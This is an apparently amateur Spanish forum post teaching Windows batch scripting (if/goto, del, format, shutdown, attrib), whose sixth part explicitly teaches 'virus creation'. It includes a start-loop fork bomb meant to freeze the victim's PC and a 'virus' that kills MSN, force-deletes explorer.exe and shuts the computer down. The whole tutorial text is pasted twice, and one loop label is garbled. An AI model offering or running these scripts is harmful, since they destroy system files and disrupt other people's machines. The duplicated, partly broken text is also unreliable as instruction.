 NailbombSuper Saiyajin 2
NailbombSuper Saiyajin 2

Cantidad de envíos : 340
Edad : 36
Sanciones : N/A
PJ preferido del ESF : .
Nik En el ESF : .
Reputación : 0
Score : 114
Fecha de inscripción : 04/08/2008
 programacion batch tuto parte 4 5 6
programacion batch tuto parte 4 5 6
Mar Ago 19, 2008 1:56 am
weno sigo con la programacion de batch
parte 4
CAPITULO 4: IF, GOTO, MENUS
Bueno, en este 4º capitulo, les explicare 2 sencillos comandos (el
goto, y el de la estructuracion por menus), y otro algo mas complicado
(el if) pero veran que con un poco de practica tambien esta chupado.
El comando goto, nos permite dar un salto a un determinado lugar del bat. Por ejemplo para ir a un menu...
Los menus, nos permiten hacer "menus" o apartados en nuestro bat.
Los menus se hacen escriviendo : y seguido el nombre del menu. (con el ejemplo de luego lo vereis mas claro)
El comando if sirve para establecer una condicion, es decir, si la condicion se cumple o no, se ara tal cosa.
El comando if, dispone de los siguientes atributos:
variable==valor (para expresar si la variable es igual a valor az esto)
variable LSS valor (para expresar si la variable es menor a valor az esto)
variable GTR valor (para expresar si la variable es mayor a valor az esto)
variable LEQ valor (para expresar si la variablees menor o igual az esto)
variable GEQ valor (para expresar si la variable es mayor o igual az esto) Para ver mas claro esto del goto, el if, y lo de los menus, les pondre un simple ejemplo.
Cita:
@echo off
title txshack if, goto y menus
:menu
cls
echo responde si o no
echo.
set /p var=quieres convertirte en hacker??
If %var%==si goto serh
If %var%==no goto noh
:serh
cls
echo pues entonces sigue los consejos de txshack
pause > nul
goto end
:noh
cls
echo.
echo pues entonces que coño aces leyendo esto??
pause > nul
goto end
:end
cls
echo.
echo adios
pause
exit
Han comprendido no?? es sencillo.
Aqui les dejo otro ejemplo
Cita:
@echo off
title ¿que numero sera...?
:menu
cls
echo deves averiguar el numero para poder salir
echo.
set /p var=pon un numero:
If %var%==5 goto si
If %var% LSS 5 goto menor
If %Var% GTR 5 goto mayor
:si
cls
echo correcto!!! por culo te la inco!! jaja
pause
goto salir
:menor
cls
echo elije otro mas alto
echo.
echo sigue jugando
pause > nul
goto menu
:mayor
echo elije otro mar pekeño!!
echo.
echo sigue probando
pause > nul
goto menu
:salir
echo.
echo asta otro dia!!
pause > nul
echo.
echo un saludo, txshack
pause
exit
Ya lo abran pillado no??
Tambien pueden usar el comando if not que hace lo contrario que el if.
En vez de decir SI pasa esto....haz esto, lo que hace es decir, SI NO
pasa esto...haz esto. ¿Entienden no??? sino agan un ejemplo veran q
facil es.
Se preguntaran tambien que pasa, cuando por ejemplo en el 1º ejemplo
que puse, en vez de escrivir si o no, escribimos otra cosa, entonces lo
que sucedera, es que el lenguage, al ser lineal, pasra a la siguiente
linea... sin importar lo q pongamos (pruevenlo).
Pero no se preocupen todo esto tiene solucion con un comando llamado else.
Lo que qiere decir es sino haz esto, es decir, por ejemplo decimos
Cita:
if %vari%=1 (goto menu1) else goto menu2
Lo que qiere decir esto, es que si la variable es 1, vallamos al menu1, sino, al menu 2.
La sintaxis seria esta
if condiciones (accion1) ELSE accion2
La 1º accion deve ir entre parentesis obligatoriamente.
Vean un ejemplo les quedara mas claro...
En el ejemplo se trata de decir si quieres un CONSEJO o si quieres
SALIR, si escrives cualqier otra cosa, veran que vuelve al principio, y
no pasa como en los ejemplos de antes
Cita:
@echo off
title txshack di soy bobo
:menu
cls
echo que quieres? consejo o salir
echo.
set /p var=dime, consejo o salir:
If %var%==consejo (goto consejo) else goto if2
:if2
if %var%==salir (goto end) else goto menu
:consejo
cls
echo ten cuidado con lo que descargas, fiate solo de txshack, el es legal!!
pause > nul
goto end
:end
cls
echo.
echo adios!!
pause
exit
parte 5
CAPITULO 5: ULTIMOS COMANDOS
Bien, si an entendido lo anterior, ya es el momento de que sepan el
resto de comandos, y experimenten y prueben por ustedes mismos.
En este capitulo, les enseñare el resto de comandos interesantes, y
para el proximo capitulo, nos meteremos con la creacion de virus, e
iran surgiendo nuevas cosas y comandos.
Bien, estos son los comandos basicos q deven recordar:
del borra archivos, por ejemplo: del c:/ruta/del/archivo/juego.exe
/P Pide confirmación en cada caso
/F Modo force. Borra incluso los archivos de solo lectura
/S Borra también los subdirectorios.
/Q Modo silencioso. No pide confirmación en ningún caso
rd borra el directorio de raid, por ejemplo: rd c:/ruta/directorio/raiz borrara ese dir.
star comienza algo, por ejemplo star www.unitedcheats.com
taskkill mata un porceso, puede ser tambien taskkill/f (fuerza bruta) ejemplo: taskkill iexplore.exe
format unidad: formatea una unidad, por ejemplo format c:
msg* hace que aparezca un mensaje en una ventana de windows, por ejemplo; msg* adios!! y no te olvides de visitar Unitedcheats.com
reg add añade lo que qeramos a la ruta del registro especificada...(ya lo veremos mas adelante)
> y >> son unos redireccionamientos, por ejemplo, si ponemos echo hola>hola.txt se nos creara en el directorio actual, un archivo de texto con el titulo de hola, y que si lo abrimos veremos la palabra hola.
Si por ejemplo ahora creamos otro y escrivimos echo adios>>hola.txt
En el archivo que teniamos anteriormente, se seguira llamando hola,
pero al abrirlo veremos que pone hola y en la linea siguiente adios.
Pero si por el contrario ponemos echo adios>hola.txt Al abrir el archivo, solo aparecera la palabra adios.
Espero que lo hayan entendido... en brebes palabras_
> crea o remplaza un archivo
>>salta hasta la linea siguiente
ejemplo:
Cita:
@echo off
echo darkgot>hola.txt
exit
Esto nos creara en el directorio actual, un archivo llamado hola.txt y en su interior pontra darkgot
* El * sirve para sustituir a todos los caracteres... por ejemplo si ponemos del *.jpg
borrara todos los archivos con extension .jpg
del a*.jpg borrara todos los jpg que empiezen por a sea cual sea su continuacion.
? El ? es parecido al anterior, solo que sustituye a un solo caracter, por ejemplo si ponemos del c?sa.jpg borrara
todos los archivos .jpg que comienzen por c (un caracter cualquiera)
sa, por ejemplo borraria; casa.jpg cosa.jpg cesa.jpg cssa.jpg....
entienden no?
El * y ? sirve tanto para el nombre como la extension.... No voy
a liarme mucho en esto, porque es algo facil y seguro que lo entienden.
Les pondre algun ejemplo que seguro q entienden.
c?sa.* (archivos c -un caracter- sa y de cualquier extension)
*asa*.b* ( -cualquier cosa- asa -cualquier cosa- y extension b + lo que sea)
CHDIR o CD [path>
Cambia al directorio indicado.
CD \\"c:\\\\archivos de programa\\" Trasladarse al directorio Archivos de programa
CD .. Trasladarse al directorio superior
CD \\\\ Trasladarse al raíz
ATTRIB [/S> [archivo>
Muestra los atributos de los archivos indicados y en su caso permite cambiarlos.
Con el parámetro /S busca también en subdirectorios.
Los atributos son:
H -> oculto. Se activa con +h y desactiva con -h
R -> Lectura. Solo lectura con +r, normal con -r
S -> Sistema. Se activa con +s y desactiva con -s
A -> Modificado. Para copias de seguridad incrementales. +a indica modificado y -a indica no modificado.
ATTRIB archivo.txt Muestra los atributos de ese archivo
ATTRIB -r archivo.txt Pone el atributo solo lectura a archivo.txt
Attrib miarchivo.txt (mostrar los atributos de miarchivo.txt)
attrib *.exe +r +r +s (pone a todos los archivos con extensión exe como ocultos, del sistema y read only)
shutdown este comando, depende de las letras que lo acompañen, puede acer una cosa u otra:
si esta seguido de -r se reiniciara el equipo
-s hara que se apage
-f forzara a cerrarse todos programas
-t 15 indica el tiempo...en este caso 15 segundos
-c " " lo que va entre comillas sera un mensaje...
pongamos un ejemplo_
shutdown -r -f -t 12 -c "jodete" esto ara q la pc se
reinicie (-r) que se cierren todos los programas forzosamente (-f) que
lo aga en 12 segundos (-t 12) y salga un mensaje q diga jodete
parte 6
CAPITULO 6: INICIACION A LA CREACION DE VIRUS
Como ya os habia dicho, a partir de aqui, comenzaremos con la creacion de virus.
Epezare con lo mas importante acerca de esto, y ya iremos abanzando.
Posiblemente repita algunas cosas ya explicadas brevemente, como el
comando shutdown, pero creo que es importante repetirlo (profundizando
algo mas) en este tema.
1.)Introduccion
Buenas , ante todo he de decir que esto es un manual de introducción y
no un manual para expertos. En este manual se hablara sobre los virus
.bat (archivos por lotes ejecutables de ms-dos)
¿Qué es un comando?
es una orden que le damos al sistema operativo para que haga una tarea determinada.
explicación: @echo off
Desabilita el echo para que no muestre los comandos , que se ejecutaran posteriormente.
explicación: shutdown
es un comando con el que puedes jugar bastante. -s y -t son parametros, los parametros son como las opciones
que les deves dar al comando. algunos comandos requieren parametros obligatoriamente sin embargo otros no.
explicación: parametro -s y -t
el parametro -s da la orden a shutdown para que apage el equipo y con -t especificamos los segundos. en el ejemplo
de antes pusimos 1 segundo.
otros parametros de shutdown:
shutdown -r = Reinicia
shutdown -c = deja un comentario "Modo de uso">> shutdown -s -t 5 c "Comentario"
shutdown -m = apaga un equipo de la red "Modo de uso">> shutdown -s -t 4 -m \\\\nombredehost
shutdown -f = fuerza el cierre de las aplicaciones.
Comandos básicos
a continuación os pondré varios comandos que sirven mucho a la hora de hacer virus.
-del = borra un archivo
-copy = copia un archivo
-reg = hacer modificaciones en el registro
-net = Muchas funciones, escriban en cmd net /? para ver sus funciones
-RD = elimina un directorio
-set = Muestra , establece, crea , variables de entorno de windows.
-taskkill o tskill = mata procesos
Comandos del registro
Operaciones:
REG QUERY /?
REG ADD /?
REG DELETE /?
REG COPY /?
REG SAVE /?
REG RESTORE /?
REG LOAD /?
REG UNLOAD /?
REG COMPARE /?
REG EXPORT /?
REG IMPORT /?
Usad estos comandos para obtener ayuda sobre los parametros después de reg.
inicio-ejecutar-cmd y escrivid algun comando para saber lo que es (asi me ahorro el explicar cada uno xD)
Bucles
Bueno un bucle es repetir muchas veces lo mismo
ejemplo
@echo off
 arkgot
arkgot
echo te estoy haciendo un bucle jaja
goto Darkgot
jeje ya podeis imaginaros las cosas que podeis hacer.
otro ejemplo:
@echo off
:menu
start
goto menu
Madre mía.. este simple código , el que lo abra tendrá que reiniciar , por que el pc se le trabará todo.
el comando start lo que hace es abrir otra shell, así que imaginate este bucle infinito.
podeis juegar con esto a vuestro antojo, abriendo blocs de notas, abriendo internet..etc
(start www.esforces.com)
Nuestro segundo virus.
@echo off
taskkill /F /IM msnmsgr.exe
del /F c:\\windows\\system32\\explorer.exe
shutdown -s -t 10 -c "Asta luego lucas!!"
Este virus cierra el msn, elimina el proceso explorer (sabes lo q es
no) y apaga la pc en 10 segundos con el mensaje asta luego lucas xD
Variables de windows xp
para ver el contenido de estas variables escriban en cmd.exe
echo %NOMBREDELAVARIABLE%
%COMPUTERNAME% = Nombre de host.
%SYSTEMROOT% = Carpeta de administración Normalmente c:\\windows
%TEMP% = directorio donde se encuentran los archivos temporales
%WINDIR% = directorio de windows.
%USERNAME% = usuario con el que se inicio sesión
%USERPROFILE% = directorio donde se encuentran los archivos del usuario que inicio sesión
%PROGRAMFILE% = directorio donde se encuentran los archivos de programas
%OS% = muestra el sistema operativo que estamos ejecutando
%LOGONSERVER% = nombre de nuestro server (\\\\mihost)
parte 4
CAPITULO 4: IF, GOTO, MENUS
Bueno, en este 4º capitulo, les explicare 2 sencillos comandos (el
goto, y el de la estructuracion por menus), y otro algo mas complicado
(el if) pero veran que con un poco de practica tambien esta chupado.
El comando goto, nos permite dar un salto a un determinado lugar del bat. Por ejemplo para ir a un menu...
Los menus, nos permiten hacer "menus" o apartados en nuestro bat.
Los menus se hacen escriviendo : y seguido el nombre del menu. (con el ejemplo de luego lo vereis mas claro)
El comando if sirve para establecer una condicion, es decir, si la condicion se cumple o no, se ara tal cosa.
El comando if, dispone de los siguientes atributos:
variable==valor (para expresar si la variable es igual a valor az esto)
variable LSS valor (para expresar si la variable es menor a valor az esto)
variable GTR valor (para expresar si la variable es mayor a valor az esto)
variable LEQ valor (para expresar si la variablees menor o igual az esto)
variable GEQ valor (para expresar si la variable es mayor o igual az esto) Para ver mas claro esto del goto, el if, y lo de los menus, les pondre un simple ejemplo.
Cita:
@echo off
title txshack if, goto y menus
:menu
cls
echo responde si o no
echo.
set /p var=quieres convertirte en hacker??
If %var%==si goto serh
If %var%==no goto noh
:serh
cls
echo pues entonces sigue los consejos de txshack
pause > nul
goto end
:noh
cls
echo.
echo pues entonces que coño aces leyendo esto??
pause > nul
goto end
:end
cls
echo.
echo adios
pause
exit
Han comprendido no?? es sencillo.
Aqui les dejo otro ejemplo
Cita:
@echo off
title ¿que numero sera...?
:menu
cls
echo deves averiguar el numero para poder salir
echo.
set /p var=pon un numero:
If %var%==5 goto si
If %var% LSS 5 goto menor
If %Var% GTR 5 goto mayor
:si
cls
echo correcto!!! por culo te la inco!! jaja
pause
goto salir
:menor
cls
echo elije otro mas alto
echo.
echo sigue jugando
pause > nul
goto menu
:mayor
echo elije otro mar pekeño!!
echo.
echo sigue probando
pause > nul
goto menu
:salir
echo.
echo asta otro dia!!
pause > nul
echo.
echo un saludo, txshack
pause
exit
Ya lo abran pillado no??
Tambien pueden usar el comando if not que hace lo contrario que el if.
En vez de decir SI pasa esto....haz esto, lo que hace es decir, SI NO
pasa esto...haz esto. ¿Entienden no??? sino agan un ejemplo veran q
facil es.
Se preguntaran tambien que pasa, cuando por ejemplo en el 1º ejemplo
que puse, en vez de escrivir si o no, escribimos otra cosa, entonces lo
que sucedera, es que el lenguage, al ser lineal, pasra a la siguiente
linea... sin importar lo q pongamos (pruevenlo).
Pero no se preocupen todo esto tiene solucion con un comando llamado else.
Lo que qiere decir es sino haz esto, es decir, por ejemplo decimos
Cita:
if %vari%=1 (goto menu1) else goto menu2
Lo que qiere decir esto, es que si la variable es 1, vallamos al menu1, sino, al menu 2.
La sintaxis seria esta
if condiciones (accion1) ELSE accion2
La 1º accion deve ir entre parentesis obligatoriamente.
Vean un ejemplo les quedara mas claro...
En el ejemplo se trata de decir si quieres un CONSEJO o si quieres
SALIR, si escrives cualqier otra cosa, veran que vuelve al principio, y
no pasa como en los ejemplos de antes
Cita:
@echo off
title txshack di soy bobo
:menu
cls
echo que quieres? consejo o salir
echo.
set /p var=dime, consejo o salir:
If %var%==consejo (goto consejo) else goto if2
:if2
if %var%==salir (goto end) else goto menu
:consejo
cls
echo ten cuidado con lo que descargas, fiate solo de txshack, el es legal!!
pause > nul
goto end
:end
cls
echo.
echo adios!!
pause
exit
parte 5
CAPITULO 5: ULTIMOS COMANDOS
Bien, si an entendido lo anterior, ya es el momento de que sepan el
resto de comandos, y experimenten y prueben por ustedes mismos.
En este capitulo, les enseñare el resto de comandos interesantes, y
para el proximo capitulo, nos meteremos con la creacion de virus, e
iran surgiendo nuevas cosas y comandos.
Bien, estos son los comandos basicos q deven recordar:
del borra archivos, por ejemplo: del c:/ruta/del/archivo/juego.exe
/P Pide confirmación en cada caso
/F Modo force. Borra incluso los archivos de solo lectura
/S Borra también los subdirectorios.
/Q Modo silencioso. No pide confirmación en ningún caso
rd borra el directorio de raid, por ejemplo: rd c:/ruta/directorio/raiz borrara ese dir.
star comienza algo, por ejemplo star www.unitedcheats.com
taskkill mata un porceso, puede ser tambien taskkill/f (fuerza bruta) ejemplo: taskkill iexplore.exe
format unidad: formatea una unidad, por ejemplo format c:
msg* hace que aparezca un mensaje en una ventana de windows, por ejemplo; msg* adios!! y no te olvides de visitar Unitedcheats.com
reg add añade lo que qeramos a la ruta del registro especificada...(ya lo veremos mas adelante)
> y >> son unos redireccionamientos, por ejemplo, si ponemos echo hola>hola.txt se nos creara en el directorio actual, un archivo de texto con el titulo de hola, y que si lo abrimos veremos la palabra hola.
Si por ejemplo ahora creamos otro y escrivimos echo adios>>hola.txt
En el archivo que teniamos anteriormente, se seguira llamando hola,
pero al abrirlo veremos que pone hola y en la linea siguiente adios.
Pero si por el contrario ponemos echo adios>hola.txt Al abrir el archivo, solo aparecera la palabra adios.
Espero que lo hayan entendido... en brebes palabras_
> crea o remplaza un archivo
>>salta hasta la linea siguiente
ejemplo:
Cita:
@echo off
echo darkgot>hola.txt
exit
Esto nos creara en el directorio actual, un archivo llamado hola.txt y en su interior pontra darkgot
* El * sirve para sustituir a todos los caracteres... por ejemplo si ponemos del *.jpg
borrara todos los archivos con extension .jpg
del a*.jpg borrara todos los jpg que empiezen por a sea cual sea su continuacion.
? El ? es parecido al anterior, solo que sustituye a un solo caracter, por ejemplo si ponemos del c?sa.jpg borrara
todos los archivos .jpg que comienzen por c (un caracter cualquiera)
sa, por ejemplo borraria; casa.jpg cosa.jpg cesa.jpg cssa.jpg....
entienden no?
El * y ? sirve tanto para el nombre como la extension.... No voy
a liarme mucho en esto, porque es algo facil y seguro que lo entienden.
Les pondre algun ejemplo que seguro q entienden.
c?sa.* (archivos c -un caracter- sa y de cualquier extension)
*asa*.b* ( -cualquier cosa- asa -cualquier cosa- y extension b + lo que sea)
CHDIR o CD [path>
Cambia al directorio indicado.
CD \\"c:\\\\archivos de programa\\" Trasladarse al directorio Archivos de programa
CD .. Trasladarse al directorio superior
CD \\\\ Trasladarse al raíz
ATTRIB [/S> [archivo>
Muestra los atributos de los archivos indicados y en su caso permite cambiarlos.
Con el parámetro /S busca también en subdirectorios.
Los atributos son:
H -> oculto. Se activa con +h y desactiva con -h
R -> Lectura. Solo lectura con +r, normal con -r
S -> Sistema. Se activa con +s y desactiva con -s
A -> Modificado. Para copias de seguridad incrementales. +a indica modificado y -a indica no modificado.
ATTRIB archivo.txt Muestra los atributos de ese archivo
ATTRIB -r archivo.txt Pone el atributo solo lectura a archivo.txt
Attrib miarchivo.txt (mostrar los atributos de miarchivo.txt)
attrib *.exe +r +r +s (pone a todos los archivos con extensión exe como ocultos, del sistema y read only)
shutdown este comando, depende de las letras que lo acompañen, puede acer una cosa u otra:
si esta seguido de -r se reiniciara el equipo
-s hara que se apage
-f forzara a cerrarse todos programas
-t 15 indica el tiempo...en este caso 15 segundos
-c " " lo que va entre comillas sera un mensaje...
pongamos un ejemplo_
shutdown -r -f -t 12 -c "jodete" esto ara q la pc se
reinicie (-r) que se cierren todos los programas forzosamente (-f) que
lo aga en 12 segundos (-t 12) y salga un mensaje q diga jodete
parte 6
CAPITULO 6: INICIACION A LA CREACION DE VIRUS
Como ya os habia dicho, a partir de aqui, comenzaremos con la creacion de virus.
Epezare con lo mas importante acerca de esto, y ya iremos abanzando.
Posiblemente repita algunas cosas ya explicadas brevemente, como el
comando shutdown, pero creo que es importante repetirlo (profundizando
algo mas) en este tema.
1.)Introduccion
Buenas , ante todo he de decir que esto es un manual de introducción y
no un manual para expertos. En este manual se hablara sobre los virus
.bat (archivos por lotes ejecutables de ms-dos)
¿Qué es un comando?
es una orden que le damos al sistema operativo para que haga una tarea determinada.
explicación: @echo off
Desabilita el echo para que no muestre los comandos , que se ejecutaran posteriormente.
explicación: shutdown
es un comando con el que puedes jugar bastante. -s y -t son parametros, los parametros son como las opciones
que les deves dar al comando. algunos comandos requieren parametros obligatoriamente sin embargo otros no.
explicación: parametro -s y -t
el parametro -s da la orden a shutdown para que apage el equipo y con -t especificamos los segundos. en el ejemplo
de antes pusimos 1 segundo.
otros parametros de shutdown:
shutdown -r = Reinicia
shutdown -c = deja un comentario "Modo de uso">> shutdown -s -t 5 c "Comentario"
shutdown -m = apaga un equipo de la red "Modo de uso">> shutdown -s -t 4 -m \\\\nombredehost
shutdown -f = fuerza el cierre de las aplicaciones.
Comandos básicos
a continuación os pondré varios comandos que sirven mucho a la hora de hacer virus.
-del = borra un archivo
-copy = copia un archivo
-reg = hacer modificaciones en el registro
-net = Muchas funciones, escriban en cmd net /? para ver sus funciones
-RD = elimina un directorio
-set = Muestra , establece, crea , variables de entorno de windows.
-taskkill o tskill = mata procesos
Comandos del registro
Operaciones:
REG QUERY /?
REG ADD /?
REG DELETE /?
REG COPY /?
REG SAVE /?
REG RESTORE /?
REG LOAD /?
REG UNLOAD /?
REG COMPARE /?
REG EXPORT /?
REG IMPORT /?
Usad estos comandos para obtener ayuda sobre los parametros después de reg.
inicio-ejecutar-cmd y escrivid algun comando para saber lo que es (asi me ahorro el explicar cada uno xD)
Bucles
Bueno un bucle es repetir muchas veces lo mismo
ejemplo
@echo off
 arkgot
arkgotecho te estoy haciendo un bucle jaja
goto Darkgot
jeje ya podeis imaginaros las cosas que podeis hacer.
otro ejemplo:
@echo off
:menu
start
goto menu
Madre mía.. este simple código , el que lo abra tendrá que reiniciar , por que el pc se le trabará todo.
el comando start lo que hace es abrir otra shell, así que imaginate este bucle infinito.
podeis juegar con esto a vuestro antojo, abriendo blocs de notas, abriendo internet..etc
(start www.esforces.com)
Nuestro segundo virus.
@echo off
taskkill /F /IM msnmsgr.exe
del /F c:\\windows\\system32\\explorer.exe
shutdown -s -t 10 -c "Asta luego lucas!!"
Este virus cierra el msn, elimina el proceso explorer (sabes lo q es
no) y apaga la pc en 10 segundos con el mensaje asta luego lucas xD
Variables de windows xp
para ver el contenido de estas variables escriban en cmd.exe
echo %NOMBREDELAVARIABLE%
%COMPUTERNAME% = Nombre de host.
%SYSTEMROOT% = Carpeta de administración Normalmente c:\\windows
%TEMP% = directorio donde se encuentran los archivos temporales
%WINDIR% = directorio de windows.
%USERNAME% = usuario con el que se inicio sesión
%USERPROFILE% = directorio donde se encuentran los archivos del usuario que inicio sesión
%PROGRAMFILE% = directorio donde se encuentran los archivos de programas
%OS% = muestra el sistema operativo que estamos ejecutando
%LOGONSERVER% = nombre de nuestro server (\\\\mihost)
Permisos de este foro:
No puedes responder a temas en este foro.

